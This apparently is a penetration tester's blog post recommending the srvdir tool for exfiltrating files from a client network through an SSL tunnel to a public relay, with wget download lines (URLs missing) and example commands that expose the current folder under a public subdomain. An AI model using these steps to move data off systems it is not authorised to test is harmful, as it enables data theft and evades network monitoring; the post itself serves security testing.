data exfiltration over SSL with srvdir

Every now and then I come across some application that may or may not have been developed with penetration testing in mind but it ends up being damn helpful all the same. Yesterday I found a post about ‘srvdir‘ (surv~durr?) which is designed to share content over SSL/TLS via a public site.

When trying to exfiltrate data from a client site I normally spend a lot of time setting up tunnels, using disposable A records from and one of my boxes in some east-european cave just so I can get the damn ‘payroll-summary-june-2014.pdf’ trophy off some box that is swimming in ssh-tunnel-fu. srvdir is the perfect answer to this problem and testing it has been awesome and full of those “Why didn’t I think of this?!!” rants.

Essentially, what srvdir does is to create a SSL tunnel to the mothership ‘’ and issue a subdomain that can be accessed externally to siphon the files off. Grabbing files is relatively painless with the odd 404 for the permission snobs. It supports basic http-auth for the paranoid and by the looks of it, tokens as well. It runs seamlessly on Windows, Linux and OSX and is relatively small.

To get the file, use wget:

wget.exe --no-check-certificate

wget --no-check-certificate

wget --no-check-certificate

Unzip the file:

./srvdir -h

./srvdir [-auth="username:password"] subdomain:path

Share current folder with custom subdomain
./srvdir norsec0de:.

Share current folder with random subdomain

keep hacking

Tagged , , , , , . Bookmark the permalink.

Comments are closed.